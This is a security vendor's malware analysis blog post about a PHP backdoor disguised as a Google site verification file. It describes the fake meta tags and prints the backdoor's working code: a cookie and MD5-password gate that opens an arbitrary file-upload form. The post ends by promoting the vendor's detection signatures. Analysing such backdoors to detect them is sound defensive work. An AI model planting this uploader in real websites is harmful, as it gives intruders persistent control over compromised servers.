Malware details

Google site verification – cookie based file upload

by

google verification

Today we found new malware that our signatures not before detected. First look it just like Google site verification code HTML file witch have also meta tags. Also added Robots to prevent index this file google.

If someone tries to access this file from the browser, it just looks normal verification code and view source also just look as below.

Filename on this malware also random string 8d4c0e4dcf768ec.php ,which not same as Google site verification code as it should be.

Google Site Verification meta tags

262f6d9a4d7bc493a15fe97e6286086b
meta name="Robots" contect="noindex,nofollow"
meta name="google-site-verification" content="262f6d9a4d7bc493a15fe97e6286086b"

Access control cookie

If there no cookie setup up, you can POST payload it with username parameter and then this malware allows you File Upload more files to the server.

if(isset($_COOKIE['pd'])){
   if($_COOKIE['pd']=="8a8f905210c6780abc7648bc1e7f3e00"){
      echo fileup();
   }
}
if(isset($_POST['username'])){
   $username=$_POST['username'];
   $username=md5($username);
   setcookie("pd",$username,time()+3600*24);
   if($username=="8a8f905210c6780abc7648bc1e7f3e00"){
      echo fileup();	
   }
   exit();
}

fileup() function

$up="<html>
<body>
<form action=\"\" method=\"post\"
enctype=\"multipart/form-data\">
<label for=\"file\">Filename:</label>
<input type=\"file\" name=\"file\" id=\"file\" /> 
<br />
<input type=\"submit\" name=\"submit\" value=\"Submit\" />
</form>
</body>
</html>";
return $up;
}
if(isset($_FILES["file"])){
if ($_FILES["file"]["error"] > 0)
 {
 echo "Error: " . $_FILES["file"]["error"] . "<br />";
 }
 else
 {
 echo "Upload: " . $_FILES["file"]["name"] . "<br />";
 echo "Type: " . $_FILES["file"]["type"] . "<br />";
 echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
 echo "Stored in: " . $_FILES["file"]["tmp_name"];
 move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
 echo $_FILES["file"]["name"];
 }
}

Final words

Use Malware Expert – Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this kind attacks.